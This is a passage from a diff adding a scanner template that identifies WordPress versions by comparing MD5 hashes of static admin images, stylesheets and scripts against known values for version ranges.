"{{BaseURL}}/wp-admin/images/fav-arrow.gif" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"c6b4cb163011e316835b02d5b277ee8a\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"e46967a00b05a38fc0a09933d8e007a3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/fade-butt.png" + matchers: + - type: dsl + name: 2.0 - 3.4.2 + dsl: + - "(\"e6c8b1c6db50db66bf04da9bbbe3ee0e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/white-grad-active.png" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"6b6d2eab57230f1d2afd4b6d9380fd1c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-dark-vs.gif" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"61bf26628d82152b801159a463aced6b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/button-grad-active.png" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"cadd565a465b3eb73ed386c210145fe2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/fav-arrow-rtl.gif" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"4372297e02320aa8bf7165b8d943a1ee\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"8dcc7939100a91147bb7fb6d2a651bec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/widgets-arrow.gif" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"e46967a00b05a38fc0a09933d8e007a3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/loading-publish.gif" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"27c1513ac7487e7d4e09fd57d85dd15c\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"26166f102406bf94c0eb9f1f11987e1f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screen-options-toggle-vs.gif" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"c3b5488f52e8e14daf595669d6fa7dc5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-dark.gif" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"a5af317b01fd87c8eceedef87ae0c26f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wpspin_dark.gif" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"5bf61d27a7893daaf24bb158fddb550a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/required.gif" + matchers: + - type: dsl + name: 2.6 - 3.4.2 + dsl: + - "(\"449bfee22ffa295314e08b314604cd0c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/archive-link.png" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"9be05a7e7b41b72e75a2beddc4f6ac55\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/blue-grad.png" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"91db2f4ffe2102d84a160bfb4492b3e1\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"e475da9341c39501f1c29e29756942f8\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"43a14f5250893e36377b90d5f6200913\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/theme-customizer.png" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"d19352b8d4c1ac5b0db05e44dc93f80d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/twitter-embed-1.png" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"b0c7cba6fb42e9afa3f3bf8b6f21f71f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/twitter-embed-2.png" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"3b84d054f2c183a602f4941690a83575\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/flex-header-media-library.png" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"702ae887ca351fbb1794d8f8e7860c4b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/flex-header-1.png" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"d46f56d75c89ca7083560530051ef334\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/flex-header-3.png" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"1adf3bac99c016f80215aa226c48295d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/flex-header-2.png" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"81d618181b57d8786f71a2dc508170bd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/captions-2.png" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"12e1605c70d4d4a3f103d16ddb89d303\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/captions-1.png" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"6e0bcf9f07953c75f042aa7f2d6a9be9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/toggle-arrow.gif" + matchers: + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"a3722fea95a66f24f350f36147bc8beb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-arrows.gif" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"f8872ea252d5551b77eff89ff7c74dcc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-bits.gif" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"98b4f1bc5b04e9964db57b8345436465\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"f8e09b1fc524fd96735945077d401793\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/white-grad.png" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"3090f8947eac64830900abf4562ca8e1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-controls.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"bfada11d185cf2a3e07371451948683a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/media-rtl.dev.css" + matchers: + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"ed5e5527b5bd5a5bca516e801dc1dc0b\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"29596814b742292023791add824b4781\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"b6c8a448b7deb1e19bf999ea1872b2e3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-fresh.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"eb885d8ae8efe89bebd275b7c0233552\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"fecf01b0229d493c31d174dce74dde32\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"1e25dcdb02e549022ccf4ac957c7b75f\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"5c6da03afe099af85d469f664b133764\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"4ce899e03ff74ffd8d9f31378d797812\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"c02acafde9e56854f48cd9943340eebe\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-classic.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"3b28c60d90878ef48406da99ac5389ac\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"85859614659bc971b6d6b98974d2c566\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"7598767c9c2dd108013717a842210df9\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"ca960e93a6b9c81f3652cee6431369dd\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"ba959fd28fc932b50466eb8e6c063c73\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"5b533d8d6bbbf363974acbb2bcd9adfd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/ie-rtl.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"c17172cffb8640db9ad587ecc3066c93\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"e14594097d99bae64e75387fc935c1e2\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"ff630250c416d6e8e30e688efec04ca7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-controls-rtl.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"0fb82a1dfce256376ec3d4f11a542d1d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/ie.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"95d14418c8e26f1bc619003f989e7d7f\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"499cf9148a1b0e615afdb375f7222bf9\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"be21783cf596914ce91198a75a50ec44\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"434caaf1626b334d24612792b1db03c9\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"9de10912b5256d5d5f26e5120bff3d38\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/tags.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"43beb69ddff35f898e5b249f7b317ff1\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"7aa22c8e635f9cba0be4254f4a3fa48d\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"0634ce262577c85d6c6d662bc383fcfa\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"0c20f6f7180474cb13d6e8caafa596e3\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"e4b154ca2cd2b7905582930f6be58ce8\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"4d39fa68e503ff895b3896b8b30ca544\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/categories.dev.js" + matchers: + - type: dsl + name: 2.9 - 3.4.2 + dsl: + - "(\"6fc0b70ea1595374c54e9d51aad4aa7f\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"cbb0371ccea124798628e181ca157a55\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/image-edit.dev.js" + matchers: + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"5802e534c29de67f2f456a48e5f633a0\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"0a91130aa8c3188c4b753fab5cab353e\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"dd82b12700f27be19c4c5df274abbb88\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"6e43e77b45b35fab9001873b804cc81b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/comment.dev.js" + matchers: + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"cd01b2bc20a1763b041cd4fe70b30ca8\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"08b5b8ab20cb303154b7bd30d29f627a\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"ebdf0f396c101af015d57df13c8e825b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/cat.dev.js" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"ed5cc1456007f3712e9722ea27253bb2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/word-count.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"86f1a330bd23226e1e7f50887e7f9ab0\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"6db343e221160c751aa5420855fd1752\" == md5(body))" + - type: dsl + name: 2.8 - 3.1.4 + dsl: + - "(\"2e2c9c93a59d78c9004c4359a2a05161\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/gallery.dev.js" + matchers: + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"c46e25f07876b469e084d9b0696ea235\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"188c746de47639e85ff7fc0f96ca8e85\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"14ad780f47e56304e6f5a65f909743e5\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"eb4e740117c8ff840c0bad6c23cdffbe\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/inline-edit-tax.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"95ccf893a74335adbc415a57f81a41be\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"0e8df5b2f2da4173eaecd2cfa5cc8ef9\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"77b5a63d3b95598a6ce8b45f2ae03ee2\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"23d59c5aefc3f6f0b809e3972ba19403\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/media-upload.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"022faf86405feb359e17b4f00e0491cd\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"df8b4a0fa85f7535c8e4ef90a7998111\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"c1bcdb3c4694c506dd64e900d12cc7a5\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"2a55cde57cdb0c810aec27fdc928e1ef\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"88f97460af4cc2a479623d2f37b7005c\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"61af37c5377935cadec17885b0f46e99\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/password-strength-meter.dev.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"b3d62fe0166b74696d6bc96159abdccd\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"2072440d1515a541623bd1ef77373c12\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"11983cbe1e9207fcc68697e52d0cfdc9\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"e2386aeb18a7e95549bcb3b525bf8b57\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"eee80fc95481ecce7de5e9f08b0574cc\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"603da6c24a56664fe3a7bc8385cba89e\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"2e994cfc7fab553a8e74b80e3eda766d\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"d7a59df48993c4bd784b2218a9316942\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"b54c11ff884ea8fcfe6e821835638da2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/inline-edit-post.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"984b28a60bb245d1f91b1e1fe20ad867\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"85a780cab162664a08008fcfea5d1c67\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"11651d7c4cea9f0273e64bda5ae07a17\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"434b94f0e74fb7bf6a765cfaee697ba6\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"350b59d8f40f7cb12636382c8a3c85c5\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"9c7423f80c6bc4ad794dfe32dd94c0df\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"0803e8b6ee18cfba4bf61503f40fe9dc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/user-suggest.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a475074c6a346983f461e0ee48269edb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/media.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"2ea3d0d07d00e3f41408e089b045c670\" == md5(body))" + - type: dsl + name: 3.1 - 3.3.3 + dsl: + - "(\"511734a3a18fc5016a8303d2a09b2143\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"59e0962c585c570c002435286795dd58\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"05d8ade5450dee08850a83ca890337e5\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"82151afee85ea31377c2d756319d8d87\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/editor.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"76567247a25ead81490b314336f0ac46\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"fa25cfc4c116b07580ab020af64721bb\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"b2645f30b7eb489d445895339405df77\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"21c67587ab462f90784f926d8596548e\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"779691c2375a8ec0f675bbda1fd6e376\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"5237280cf062f0466e1bb2c52b7585fe\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/xfn.dev.js" + matchers: + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"d627144ce38e26b1b1fd91b5dcb503ff\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"e15936905405f555f881091a8d1ec95f\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"07f6405c0e3617f34ce1d404088fe2bb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"aa10d449951b0d66e994c71b89b27912\" == md5(body))" + - type: dsl + name: 3.1 - 3.3.3 + dsl: + - "(\"4e0dc911afce054cfeb93359fa43ec72\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/media-gallery.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"365f0de914a67921ec1ca7f2c1f6c7fc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme-preview.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"36dabc552ff9315e1e782ad144ea383d\" == md5(body))" + - type: dsl + name: 3.0 - 3.3.3 + dsl: + - "(\"842531d9bc70b047e9a413b91f66cd96\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"1594334801bab2aa5bbcac672d855780\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/utils.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a5f4880c9cca30561e9290f0dafda128\" == md5(body))" + - type: dsl + name: 3.1 - 3.3.3 + dsl: + - "(\"eb27f928ad4bdb39c07e2ff3eed95cbb\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"ff272859f10cd239e8e27cae422b6656\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/custom-fields.dev.js" + matchers: + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"87be866a7cdc94d840e6ed570c01efdd\" == md5(body))" + - type: dsl + name: 2.8 - 3.1.4 + dsl: + - "(\"06cb5141c3ac8e8abdfa887560fc9fc0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/set-post-thumbnail.dev.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"c6d8c11219599e48d32cb3dbefe43d29\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"d731591839cfd06e33776617be599982\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/plugin-install.dev.js" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"45050658679cde23b3e31be7de31e526\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"1217773a91b7c15facf17f08c6366eb6\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"7cd872829eeaeee63270591b89d50ce9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/custom-background.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"56f69a07423e2580219a8d54612099fb\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"18c3b57b631f56a0dcb63f0fe5f10305\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"62230d261801142f30d52e1dc6969d28\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"72c8235ff0eea718edafee3dea558f31\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/utils.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"284f0a2c317e3e094f08677e1b451c8a\" == md5(body))" + - type: dsl + name: 3.1 - 3.3.3 + dsl: + - "(\"549df3fa634602b63688d98547c6f452\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"e102613271d205d357aa317ee6c8f32b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/nav-menu.dev.js" + matchers: + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"bfbdd5233cbb89378be6c44001491b31\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"317255427d2538b776ef410cf01bab1c\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"ca4ec46d0208dae54597f758e1085ed7\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"4d4d1c740d3332af7e2a8ba23eba439d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/swfupload-all.js" + matchers: + - type: dsl + name: 3.2 - 3.5.1 + dsl: + - "(\"baa556317b44bc0dd82864676833540f\" == md5(body))" + - type: dsl + name: 2.8 - 3.1.4 + dsl: + - "(\"8c132780860b2d20c1837c6e05869393\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/about-color-picker.png" + matchers: + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"08b02c06a5d28b21f81069ad51963592\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/about-retina.png" + matchers: + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"fd063343a877ac481220c41e49ee8f4f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/about-media.png" + matchers: + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"5b3063ef865b732f9fde36bfa7d26f3f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/about-twenty-twelve.png" + matchers: + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"e9bbcb3c6459eab990f96fad803359c5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/js/editimage.min.js" + matchers: + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"b7f2ab839344415015809824e6d1ee27\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/cat.js" + matchers: + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"7060f71460529e6377416bb39ae61408\" == md5(body))" + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"8a0487d34029c6621081f5a89d91a82d\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"fbf652a8b7d8ec28b85d3398d36099aa\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"6942a4d0bc06b51ae402ec77f08bae0b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/cat.min.js" + matchers: + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"6e76c426994895bb6e9a574fe3b01048\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wpmini-blue-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"13e7ab1ac2f6c77f177c849576bfdf31\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wpmini-blue.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"e8d9359697813d9df251808ec4b58b71\" == md5(body))" + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"46b52530984eff532be3372596c66386\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/thickbox/tb-close.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"19efae1b275c9c70a783799e259e059e\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"7c088dbddefa7aff7a860580a98f3e30\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/thickbox/tb-close-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"ae65a3a2de0cb24ecef3065a1618fdac\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/more_bug.gif" + matchers: + - type: dsl + name: 3.4 - 3.7.35 + dsl: + - "(\"c38cc928b95c0be49ec083648084d190\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/page_bug.gif" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"ea31916969e5255f353febf4b9b55a38\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"32a68c86a6beffdd042abf0b0c595328\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/press-this-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"8be606bebfbff936f7d6ac3927be1337\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows-pr-2x.png" + matchers: + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"b008e43aab25a6a2cd4ef2f0a5c4bfba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/stars-rtl.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"a3c107d957897a323b9801eb7a0479ad\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7dcc04a095e8470670d74e0de8c7bd1a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows-dark-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"bc97d62061c943dd6ff71d964c7d8425\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wordpress-logo-2x.png" + matchers: + - type: dsl + name: 3.4 - 3.7.35 + dsl: + - "(\"784aa9fed2f19f1607cae85205507163\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows-pr.png" + matchers: + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"df60fed3e762a0b86903b629f90ffd79\" == md5(body))" + - method: GET + path: + - 